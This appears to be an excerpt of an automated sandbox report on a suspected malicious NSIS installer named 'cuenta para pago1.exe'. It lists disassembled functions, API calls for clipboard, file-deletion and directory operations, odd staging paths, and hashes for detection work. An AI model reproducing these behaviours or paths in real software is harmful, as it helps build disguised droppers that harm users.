                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\$C:\Users\user\Desktop$C:\Users\user\Desktop\cuenta para pago1.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                      • API String ID: 2488574733-2814670859
                                                                                      • Opcode ID: c7933ff0207dc42ed488cfd770cac36fd4143b1ba3a2b25aa7f82e1899741bfa
                                                                                      • Instruction ID: 73295983c26b9bc795aacbdf710e3d5853a553e8a558082b103844ae68e0e3ab
                                                                                      • Opcode Fuzzy Hash: c7933ff0207dc42ed488cfd770cac36fd4143b1ba3a2b25aa7f82e1899741bfa
                                                                                      • Instruction Fuzzy Hash: C3D1F470644200BBD720BF659D45A3B3AACEB8074AF10487EF541B62D2DB7D9D42CB6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004052B8 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 133 4052b8-4052d3 134 405462-405469 133->134 135 4052d9-4053a0 GetDlgItem * 3 call 404113 call 404a16 GetClientRect GetSystemMetrics SendMessageW * 2 133->135 137 405493-4054a0 134->137 138 40546b-40548d GetDlgItem CreateThread CloseHandle 134->138 157 4053a2-4053bc SendMessageW * 2 135->157 158 4053be-4053c1 135->158 140 4054a2-4054a8 137->140 141 4054be-4054c8 137->141 138->137 145 4054e3-4054ec call 404145 140->145 146 4054aa-4054b9 ShowWindow * 2 call 404113 140->146 142 4054ca-4054d0 141->142 143 40551e-405522 141->143 147 4054d2-4054de call 4040b7 142->147 148 4054f8-405508 ShowWindow 142->148 143->145 151 405524-40552a 143->151 154 4054f1-4054f5 145->154 146->141 147->145 155 405518-405519 call 4040b7 148->155 156 40550a-405513 call 405179 148->156 151->145 159 40552c-40553f SendMessageW 151->159 155->143 156->155 157->158 162 4053d1-4053e8 call 4040de 158->162 163 4053c3-4053cf SendMessageW 158->163 164 405641-405643 159->164 165 405545-405570 CreatePopupMenu call 40603c AppendMenuW 159->165 172 4053ea-4053fe ShowWindow 162->172 173 40541e-40543f GetDlgItem SendMessageW 162->173 163->162 164->154 170 405572-405582 GetWindowRect 165->170 171 405585-40559a TrackPopupMenu 165->171 170->171 171->164 174 4055a0-4055b7 171->174 175 405400-40540b ShowWindow 172->175 176 40540d 172->176 173->164 177 405445-40545d SendMessageW * 2 173->177 178 4055bc-4055d7 SendMessageW 174->178 179 405413-405419 call 404113 175->179 176->179 177->164 178->178 180 4055d9-4055fc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 178->180 179->173 182 4055fe-405625 SendMessageW 180->182 182->182 183 405627-40563b GlobalUnlock SetClipboardData CloseClipboard 182->183 183->164
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405316
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405325
                                                                                      • GetClientRect.USER32(?,?), ref: 00405362
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405369
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405405
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405426
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405334
                                                                                        • Part of subcall function 00404113: SendMessageW.USER32(00000028,?,?,00403F3F), ref: 00404121
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405478
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000524C,00000000), ref: 00405486
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0040548D
                                                                                      • ShowWindow.USER32(00000000), ref: 004054B1
                                                                                      • ShowWindow.USER32(?,00000008), ref: 004054B6
                                                                                      • ShowWindow.USER32(00000008), ref: 00405500
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
                                                                                      • CreatePopupMenu.USER32 ref: 00405545
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
                                                                                      • GetWindowRect.USER32(?,?), ref: 00405579
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405592
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
                                                                                      • OpenClipboard.USER32(00000000), ref: 004055DA
                                                                                      • EmptyClipboard.USER32 ref: 004055E0
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004055F6
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040562A
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405635
                                                                                      • CloseClipboard.USER32 ref: 0040563B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: {$&B
                                                                                      • API String ID: 590372296-2518801558
                                                                                      • Opcode ID: 2a917bbd3b44fd9cb5b6d0897a12355830e6d7475328c9c4ea58580c84b5c048
                                                                                      • Instruction ID: b072520f5ee80a331e4e918265d0c1a5052efaeab479527f9264255038cc5675
                                                                                      • Opcode Fuzzy Hash: 2a917bbd3b44fd9cb5b6d0897a12355830e6d7475328c9c4ea58580c84b5c048
                                                                                      • Instruction Fuzzy Hash: BDB13B71900208FFDB219F60DD89AAE7B79FB44355F10803AFA01B61A0C7755E92DF69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040580B Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 489 40580b-405831 call 405ad6 492 405833-405845 DeleteFileW 489->492 493 40584a-405851 489->493 494 4059c7-4059cb 492->494 495 405853-405855 493->495 496 405864-405874 call 40601a 493->496 497 405975-40597a 495->497 498 40585b-40585e 495->498 504 405883-405884 call 405a1a 496->504 505 405876-405881 lstrcatW 496->505 497->494 500 40597c-40597f 497->500 498->496 498->497 502 405981-405987 500->502 503 405989-405991 call 40635d 500->503 502->494 503->494 513 405993-4059a7 call 4059ce call 4057c3 503->513 508 405889-40588d 504->508 505->508 509 405899-40589f lstrcatW 508->509 510 40588f-405897 508->510 512 4058a4-4058c0 lstrlenW FindFirstFileW 509->512 510->509 510->512 514 4058c6-4058ce 512->514 515 40596a-40596e 512->515 529 4059a9-4059ac 513->529 530 4059bf-4059c2 call 405179 513->530 517 4058d0-4058d8 514->517 518 4058ee-405902 call 40601a 514->518 515->497 520 405970 515->520 521 4058da-4058e2 517->521 522 40594d-40595d FindNextFileW 517->522 531 405904-40590c 518->531 532 405919-405924 call 4057c3 518->532 520->497 521->518 525 4058e4-4058ec 521->525 522->514 528 405963-405964 FindClose 522->528 525->518 525->522 528->515 529->502 535 4059ae-4059bd call 405179 call 405ebb 529->535 530->494 531->522 536 40590e-405917 call 40580b 531->536 540 405945-405948 call 405179 532->540 541 405926-405929 532->541 535->494 536->522 540->522 544 40592b-40593b call 405179 call 405ebb 541->544 545 40593d-405943 541->545 544->522 545->522
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                                                                      • lstrcatW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,\*.*), ref: 0040587C
                                                                                      • lstrcatW.KERNEL32(?,00409014), ref: 0040589F
                                                                                      • lstrlenW.KERNEL32(?,?,00409014,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058A5
                                                                                      • FindFirstFileW.KERNELBASE(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,?,00409014,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B5
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405964
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 2035342205-1035049153
                                                                                      • Opcode ID: e5205ecd88fce5ccf5828815dd77ba019690641696c58a1a3b737e95854e38d1
                                                                                      • Instruction ID: b6454d918ebd5faba2d20934ef042a1c7892e73fe5aa147b237895e66f915a66
                                                                                      • Opcode Fuzzy Hash: e5205ecd88fce5ccf5828815dd77ba019690641696c58a1a3b737e95854e38d1
                                                                                      • Instruction Fuzzy Hash: 0041BF71900A14FACB21AB658C89EBF7678EB41768F10817BF801751D1D77C4981DEAE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405648 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 633 405648-405693 CreateDirectoryW 634 405695-405697 633->634 635 405699-4056a6 GetLastError 633->635 636 4056c0-4056c2 634->636 635->636 637 4056a8-4056bc SetFileSecurityW 635->637 637->634 638 4056be GetLastError 637->638 638->636
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                                                      • GetLastError.KERNEL32 ref: 0040569F
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
                                                                                      • GetLastError.KERNEL32 ref: 004056BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$s@
                                                                                      • API String ID: 3449924974-3165040759
                                                                                      • Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                                                      • Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
                                                                                      • Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                                                      • Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040635D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00425738,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00405B1F,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, 4Ww,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,77573420,C:\Users\user\AppData\Local\Temp\), ref: 00406368
                                                                                      • FindClose.KERNEL32(00000000), ref: 00406374
                                                                                      Strings
                                                                                      • dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 0040635D
                                                                                      • 8WB, xrefs: 0040635E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: 8WB$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 2295610775-1340106231
                                                                                      • Opcode ID: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                                                      • Instruction ID: 8488419dd32d28aa1913c95702376fed147eab6209e3de196541cdf70887181d
                                                                                      • Opcode Fuzzy Hash: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                                                      • Instruction Fuzzy Hash: BED01231949120ABC31417786D0C88B7A599F553317218E33F82AF53E0C3348C2586E9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004066E2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                                                      • Instruction ID: 8bf6f29b28aad36262c5774fab9fc5fc8376212b20b0a75e389b428f0a59168b
                                                                                      • Opcode Fuzzy Hash: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                                                      • Instruction Fuzzy Hash: B5F16571D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A9ACF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 46bfe881245e9c09c60a9812fea19b817693455353fba4155f8684d2f21f36a4
                                                                                      • Instruction ID: 35ddb734ec7d865f8f709f830fd12decc1a753c42de70ab183506872ff8e9077
                                                                                      • Opcode Fuzzy Hash: 46bfe881245e9c09c60a9812fea19b817693455353fba4155f8684d2f21f36a4
                                                                                      • Instruction Fuzzy Hash: 0DF08271A00114DBC711EFA4DD49AAEB374FF44324F20457BF115F21E1D7B899409B29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403C06 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 184 403c06-403c18 185 403d59-403d68 184->185 186 403c1e-403c24 184->186 188 403db7-403dcc 185->188 189 403d6a-403db2 GetDlgItem * 2 call 4040de SetClassLongW call 40140b 185->189 186->185 187 403c2a-403c33 186->187 190 403c35-403c42 SetWindowPos 187->190 191 403c48-403c4b 187->191 193 403e0c-403e11 call 40412a 188->193 194 403dce-403dd1 188->194 189->188 190->191 196 403c65-403c6b 191->196 197 403c4d-403c5f ShowWindow 191->197 202 403e16-403e31 193->202 199 403dd3-403dde call 401389 194->199 200 403e04-403e06 194->200 203 403c87-403c8a 196->203 204 403c6d-403c82 DestroyWindow 196->204 197->196 199->200 221 403de0-403dff SendMessageW 199->221 200->193 201 4040ab 200->201 209 4040ad-4040b4 201->209 207 403e33-403e35 call 40140b 202->207 208 403e3a-403e40 202->208 212 403c8c-403c98 SetWindowLongW 203->212 213 403c9d-403ca3 203->213 210 404088-40408e 204->210 207->208 217 403e46-403e51 208->217 218 404069-404082 DestroyWindow EndDialog 208->218 210->201 215 404090-404096 210->215 212->209 219 403d46-403d54 call 404145 213->219 220 403ca9-403cba GetDlgItem 213->220 215->201 223 404098-4040a1 ShowWindow 215->223 217->218 224 403e57-403ea4 call 40603c call 4040de * 3 GetDlgItem 217->224 218->210 219->209 225 403cd9-403cdc 220->225 226 403cbc-403cd3 SendMessageW IsWindowEnabled 220->226 221->209 223->201 254 403ea6-403eab 224->254 255 403eae-403eea ShowWindow KiUserCallbackDispatcher call 404100 EnableWindow 224->255 229 403ce1-403ce4 225->229 230 403cde-403cdf 225->230 226->201 226->225 232 403cf2-403cf7 229->232 233 403ce6-403cec 229->233 231 403d0f-403d14 call 4040b7 230->231 231->219 235 403d2d-403d40 SendMessageW 232->235 237 403cf9-403cff 232->237 233->235 236 403cee-403cf0 233->236 235->219 236->231 240 403d01-403d07 call 40140b 237->240 241 403d16-403d1f call 40140b 237->241 250 403d0d 240->250 241->219 251 403d21-403d2b 241->251 250->231 251->250 254->255 258 403eec-403eed 255->258 259 403eef 255->259 260 403ef1-403f1f GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 403f21-403f32 SendMessageW 260->261 262 403f34 260->262 263 403f3a-403f78 call 404113 call 40601a lstrlenW call 40603c SetWindowTextW call 401389 261->263 262->263 263->202 272 403f7e-403f80 263->272 272->202 273 403f86-403f8a 272->273 274 403fa9-403fbd DestroyWindow 273->274 275 403f8c-403f92 273->275 274->210 277 403fc3-403ff0 CreateDialogParamW 274->277 275->201 276 403f98-403f9e 275->276 276->202 278 403fa4 276->278 277->210 279 403ff6-40404d call 4040de GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 277->279 278->201 279->201 284 40404f-404062 ShowWindow call 40412a 279->284 286 404067 284->286 286->210
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
                                                                                      • ShowWindow.USER32(?), ref: 00403C5F
                                                                                      • DestroyWindow.USER32 ref: 00403C73
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403CB0
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403CCB
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403D79
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403D83
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
                                                                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403DEE
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403E94
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403EB5
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EC7
                                                                                      • EnableWindow.USER32(?,?), ref: 00403EE2
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403EF8
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403EFF
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F17
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
                                                                                      • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
                                                                                      • SetWindowTextW.USER32(?,004226E8), ref: 00403F67
